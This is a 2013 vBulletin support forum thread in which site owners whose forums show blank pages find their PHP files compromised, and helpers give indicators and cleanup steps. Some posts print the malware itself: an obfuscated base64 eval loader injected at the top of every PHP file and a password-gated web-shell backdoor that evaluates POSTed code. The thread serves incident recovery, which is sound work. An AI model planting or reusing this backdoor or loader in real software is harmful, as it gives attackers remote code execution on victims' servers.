Help. Both forum and admin panel just show white page

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • stable2
    New Member
    • Feb 2008
    • 20

    Help. Both forum and admin panel just show white page

    I am running 4.22
    Today my forum and admin has disappeared and just shows a white page.
  • Mark.B
    vBulletin Support
    • Feb 2004
    • 24286
    • 6.0.X

    #2
    What changes have been made since it last worked?
    This includes changes made on the server.
    MARK.B
    vBulletin Support
    ------------
    My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
    My Unofficial vBulletin Cloud Demo: https://www.adminammo.com

    Comment

    • stable2
      New Member
      • Feb 2008
      • 20

      #3
      Absolutely none

      Comment

      • stable2
        New Member
        • Feb 2008
        • 20

        #4
        Web host suggested checking php error log. There is a list of errors - but I have now no idea what to do

        Comment

        • BirdOPrey5
          Senior Member
          • Jul 2008
          • 9613
          • 5.6.3

          #5
          Post some of the most recent errors in the error log here- feel free to hide/ erase the path to the files if you want for added security.

          Also, check any of your php files, like forum.php, does it look like this or something different? If there are lines between <?php and what you see below you files may have been compromised.

          Code:
          <?php
          /*======================================================================*\
          || #################################################################### ||
          || # vBulletin 4.2.2 - Licence Number ....
          || # ---------------------------------------------------------------- # ||
          || # Copyright ©2000-2013 vBulletin Solutions Inc. All Rights Reserved. ||
          || # This file may not be redistributed in whole or significant part. # ||

          Comment

          • stable2
            New Member
            • Feb 2008
            • 20

            #6
            Forum php:
            <?php eval(base64_decode("DQpldmFsKGJhc2U2NF9kZWNvZGUoIlpYWmhiQ2huZW5WdVkyOXRjSEpsYzNNb1ltRnpaVF kwWDJSbFkyOWtaU2duWlU1d1ZHTm1abmhrTTB3d1ExazFWMm93TDB4cVJtVlFkRmhWYzB0cmNYTXhSa0pRVEZOeVMw dzBjRmhXT1VKVVREQnZkSGxET0hGNVkzaE1Wamxr

            Comment

            • stable2
              New Member
              • Feb 2008
              • 20

              #7
              Error log:
              :
              /home3/findhors/public_html/stabletostable/forums/error_log: [19-Dec-2013 03:58:25] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 03:58:35] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 03:58:36] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/showthread.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 03:58:40] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 03:58:44] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:00:20] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/forum.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:00:24] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/login.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:00:47] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:00:49] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/showthread.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:01:37] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/calendar.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:02:08] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:02:35] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/forum.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:03:03] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/entry.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:04:00] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/entry.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:04:19] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/forum.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:04:55] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/entry.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:05:02] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/entry.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:05:14] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/forum.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:05:14] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/login.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:05:26] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/entry.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:06:11] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:06:34] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/entry.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:06:42] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/forum.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:07:10] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/forum.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:07:18] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/calendar.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:07:28] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/entry.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:07:48] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:07:50] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/search.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:07:53] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/forumdisplay.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:08:05] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/entry.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1:

              Comment

              • donald1234
                Senior Member
                • Oct 2011
                • 1953
                • 4.1.x

                #8
                Originally posted by stable2
                Forum php:
                <?php eval(base64_decode("DQpldmFsKGJhc2U2NF9kZWNvZGUoIlpYWmhiQ2huZW5WdVkyOXRjSEpsYzNNb1ltRnpaVF kwWDJSbFkyOWtaU2duWlU1d1ZHTm1abmhrTTB3d1ExazFWMm93TDB4cVJtVlFkRmhWYzB0cmNYTXhSa0pRVEZOeVMw dzBjRmhXT1VKVVREQnZkSGxET0hGNVkzaE1Wamxr
                That looks compromised. I would upload a fresh set of vb files. That may fix the issue but won't answer why the files got compromised.

                Comment

                • stable2
                  New Member
                  • Feb 2008
                  • 20

                  #9
                  OK. Will I be able to do that even though I cannot get into admin cp?

                  Comment

                  • donald1234
                    Senior Member
                    • Oct 2011
                    • 1953
                    • 4.1.x

                    #10
                    Yes just use FTP.

                    Looks like you are not the only one. Post 6

                    Comment

                    • MNbiker
                      New Member
                      • Jan 2003
                      • 27
                      • 4.0.0

                      #11
                      This appears to be the same problem several of us reported yesterday. It appears a new kind of attack has cropped up.
                      A complete re-load of the vB files fixed our site last night, but it's down again this morning. I changed passwords for all the admin accounts, my FTP, etc., but the site went down again anyway.

                      Comment

                      • BirdOPrey5
                        Senior Member
                        • Jul 2008
                        • 9613
                        • 5.6.3

                        #12
                        95% sure you have a compromised plugin- the only way to find it though it to upload a fresh set of vBulletin files, that will get your site online again. Then immediately go to your Admin CP and disable any plugins you see in plugin manager listed at the top under the "vBulletin" Product. Check each one individually- by default there are no plugins for this product- so any there should be ones you created yourself. Disable or delete any you don't recognize.

                        Next you need to do more clean up and securing your site- follow the steps in these two blogs-

                        This guide is for what to do, after youÂ’ve been hacked, exploited, and or defaced. Step 1, Change everything: If you believe, or think your site has


                        Getting Started This guide is intended to be a starting point for helping to keep your site safe and secure in the long run. It is not a be-all, end-all guide

                        Comment

                        • TheLastSuperman
                          Senior Member
                          • Sep 2008
                          • 1799

                          #13
                          I've ran into this a few times lately and was even discussing this with Greg from URLJet today sadly, here's what to look for:
                          • New Administrators (typically the name used is qaz001 and there might be 5+ or more new admin accounts all using the same name)
                          • New Plugins (init_startup hook primarily connecting to subscriptions.php OR a different plugin allowing them to do what they wish from the FAQ page).
                          • New files.

                          ^ This includes files such as img.php / datastore_movie.php and similar, the files may contain code such as:
                          PHP Code:
                          <?php

                          if(@md5($_POST["gif"]) === "320648220d6bd8b8e51ec3b6d6dd8898") {

                          eval (
                          base64_decode($_POST["php"]));

                          exit;

                          }

                          ?>

                          Furthermore there will also be shell scripts uploaded to your site, rather nasty ones at that! The malicious files were inserted throughout various folders such as /includes/ and includes/cron/ and others so be sure to take your time and check all folders by hand noting timestamps on files, one of the file I encountered had a 2006 timestamp while others were dated 2012.
                          • Modified Files.

                          ^ These modified files are nearly all .php files so with that being said you must, I repeat, you must upload 100% fresh files. What files you ask? ALL of them, download a 100% fresh version of vBulletin, all of your modifications files need to be replaced as well this includes all you've downloaded from vbulletin.org and all third-party modifications or any software within the same /public_html/ i.e. root directory of the site and/or forum. I cannot stress enough that you need to upload fresh files however yes feel free to edit all by hand however every single instance in a file where <?php is will have the base64 code directly following I can guarantee that so don't waste your time simply replace and be done with it.

                          Code added to all .php files near top will be:
                          PHP Code:
                          <?php eval(base64_decode("DQpldmFsKGJhc2U2NF9kZWNvZGUoIlpYWmhiQ2huZW5WdVkyOXRjSEpsYzNNb1ltRnpaVFkwWDJSbFkyOWtaU2duWlU1d01WVmpSVXQzYWtGTkwxSlZVRkZvVjBkUWVVRmxOWE5YVERSTlIycFRRbXhrTTBGd01VeFdhMGc0S3psME1HMDNaRUpET1VvcmNFd3pXSFJ3ZFV3NVptSjFZbnBsU0RCTEszUkNWRkJWTkd4WlpsaGFRMmxqTVVKRVFsUlJWVXBUTmpBMVV6bExRVkpzVGxOQmJFbDViakpHVFVKaVVqRXlWbGRNU1VoVU1WWkZSVGhrU1VkSWJGazRVMUpIZG1wTE1taDNSRUUyUm1sVllWUlZhbFpKTjA4eVNuQmFhRU5DWVd4QmFrOXZkR1JrUlRWQlYzRm9jSGN6YVZBMFpIVlVXWE42ZG1wbGNYRk1UMEpLVUVGWFdFVm9OSEJTZWtOM09Ya3JWMXB5VDBkVVlYVTFiakZsVTBnMll6VXZiVXhRY1hJd0wyRmlTMFV6ZFZVclMwUnhTR2hXTTNSWVVFMUZMekZaV20xaFJrUmFlVWhqTVRBeFZ6Y3liVkJzYzJSb09EbFNXaTlpYWxKMGR6ZzRaRVF2ZG1wR2VsSldibG8wUFNjcEtTazdJRDgrUEQ4Z1pYWmhiQ2huZW5WdVkyOXRjSEpsYzNNb1ltRnpaVFkwWDJSbFkyOWtaU2duWlU1dk1XbzVSazk0UTBGUlVsZzViRkY0Y21KdFoySmxNMWQzWVhZd1RqaEhRM0ZHWTFOdVZVdGlaMU0wTnpnM01WY3dlWGxVTTJONlNqQmFOV2hMYm1wRGJXVmFkWGRoTjB3NFluVkVkMVJSWlRKRmVqTnNPVlYxY0VSdmNuZzFhMEZIVlVkT2NuRTNaWGx5U2xRck15OU5hV1Z4TVhwbVF6VmFNa1ZDVmpoVGJVbFJRbkZPYWtsV2FFMXpUVlJyYTNSMk9XZEtPVmRVYld4b2FFUldVbHB2TTI5R2JVTTVWMUZOYURjeVUzTkxNVVpUV1dSNGVUSlRaVlZPWTFZM2VrZERWMjlVU210cVRGWlJkVTUxY1ZGdWVYcFlOWEJxSzI4NE0wTjZValZRV0dKNVkyVjZNVkY1UWpsVldIVm1VemhyUm5FclZ5OXlNMmxEU0hKbU9WZ3lTM0F5ZDNKVVkyUTNUV0ZHU3paSWRHVnRXVGxOUldzM1pYTkhSR3R5SzJwUVdsaERhV1ZIYm1od09GQllPRGgzZEdWWU1qTkhKeWtwS1RzZ1B6NDhQeUJsZG1Gc0tHZDZkVzVqYjIxd2NtVnpjeWhpWVhObE5qUmZaR1ZqYjJSbEtDZGxUbkE1YXprNVRIZDZRVkZuVUN0V1QxRndUSE5GYW5VeWJsTnlXWGM0VkRadWQxbExkRE13Y0ZsUmFUWnhRWFpMTkhkS2QzUnFMMkp1TjI5a2JYTmhTREJ5VXpOdVpETjVaR05yTW5VeGNrMWtjekJVVUVKd2NFOWpkMmw0WWt4d04zWTFZMnhYVGpack1WUnFNVkZzUms1UGVEZHNaRkY2VUVsNFEwTkZkMDV1VUZKbkswVktlVE5PU1RSc016ZDBaakZuTkd4eVkxTlFUbmN4ZUZRNWNITnNkbGhyTDBvNVFucFRVU3RNYmxOeldEQm9iMFJpVW1WSGNHaFpSM0k0ZDB0M0t6TkJWa3R3YWxwbmJtaFNUVXhyYzJGS1N6ZGhWMUJHTDNGSmRVb3ZWa3hVTkhwalduTlBkV0pLZDJaNlEwSnVWV0l3Y1hsMFpXbHlRamRYTml0bE5reFBOa3h6YVdwa09ISktUemhGVnk4eFVFNUdPR0pvVjNCdk4xaEpTR1V5V2t0NE0ydElSR1UzWjJJcmNuaFRSVk5SVFUxRlJWbEhSME5TVFVadFFWTjNiM2RFVkVWeFdWTlpRMUpvVFd0RVZFVlpXVVZCUm05VVEwVkpVVUpOUzFsUlEybHhhVWhuUjNGc2NrTk5hRWRqUTJSWmRXaE5iaXQ1UmpCVlVGbDJVa2hXUkhkRVpGTXplRUZSYW14Uk5HRlBVRGhaU1N0MGVERkljR0ZMV0ROUlJsRTJaMmx1YlUwNWNqVmpUbTByZGlzeVltUnVjemR6VEdSMGVVdGxaak00TVdWWU5XNXFPR1puUkZkV1ZtRmFkejA5SnlrcEtUcz0iKSk7DQo="));

                          !Attention! If you/your host is running any form of backup software or for example if you see a public_html.bak folder, that must be replaced/renamed/deleted (**Try setting CHMOD permissions to 000 then check the site ensuring nothing is connecting i.e. utilizing anything from the .bak folder first before deleting it!) otherwise if the files are seen as modified/missing and they are replaced... well the replacement file comes from public_html.bak which by now more than likely has a backup of the file in it's hacked state .

                          *After you clean the site remember to change all database users, don't just change the users password remove the user from the database and assign a new user w/ full permissions. Change all FTP account passwords and also your forum administrator account password. Also I want to mention that I've noticed after adding in .htaccess protection to admincp and modcp folders the hacker was not able to hack the site again and on many of these sites the /install/ folder was not present therefor it is not the recent install folder exploit as of late.

                          Use the links Joe posted and feel free to use my older blog entry it's still valid and I reply accordingly when prompted to .
                          Last edited by TheLastSuperman; Thu 19 Dec '13, 10:40pm.


                          Former vBulletin Support Staff
                          Hacked recently? See my blog post "Recovering a Hacked vBulletin Site".
                          Thinking outside the box? Need modification support? Visit www.vBulletin.org and have at it!

                          Comment

                          • XDuncan
                            Member
                            • Oct 2004
                            • 99
                            • 3.0.0 'Gold'

                            #14
                            This is getting freaking ridiculous. Surely you will do something about this vBulletin. Your patch 8 is definitely unstable. I have re-installed the patch 8 files 5 times but keep getting hacked. I have 2 plugins. A thank you hack and a custom hack. These are not the issues. Please address the issue with your code and release a new patch. Our site gets over 150,000 impressions per day and we are seriously considering switching software. Surely you cannot assume that the 100+ people having this issue just have a faulty plugin. We only have 2 and none are the issue.

                            Thanks,

                            Comment

                            • BirdOPrey5
                              Senior Member
                              • Jul 2008
                              • 9613
                              • 5.6.3

                              #15
                              Originally posted by XDuncan
                              This is getting freaking ridiculous. Surely you will do something about this vBulletin. Your patch 8 is definitely unstable. I have re-installed the patch 8 files 5 times but keep getting hacked. I have 2 plugins. A thank you hack and a custom hack. These are not the issues. Please address the issue with your code and release a new patch. Our site gets over 150,000 impressions per day and we are seriously considering switching software. Surely you cannot assume that the 100+ people having this issue just have a faulty plugin. We only have 2 and none are the issue.

                              Thanks,
                              Offhand I'm not sure which old version is already up to Patch 8 but our first advice on securing a site is to download./install the latest version which is 4.2.2 and has no patches available.

                              Also, after the first hack you should not have needed to install the patch anymore but simply re-upload a fresh set of files which would have had the patch included already when you downloaded them from the Member's Area.

                              I see you have ticket support- please open a support ticket in the Member's Area with "Attn: Joe D" and include Admin CP and FTP login info in the sensitive data field of the support ticket system and I'll take a look to see if I can find the reason you have been getting re-hacked.

                              At this point I am still going on the theory most of these were due to the earlier /install/ exploit and there have been "sleeper" administrator accounts on these sites that were never noticed or removed because the sites weren't initially defaced.

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...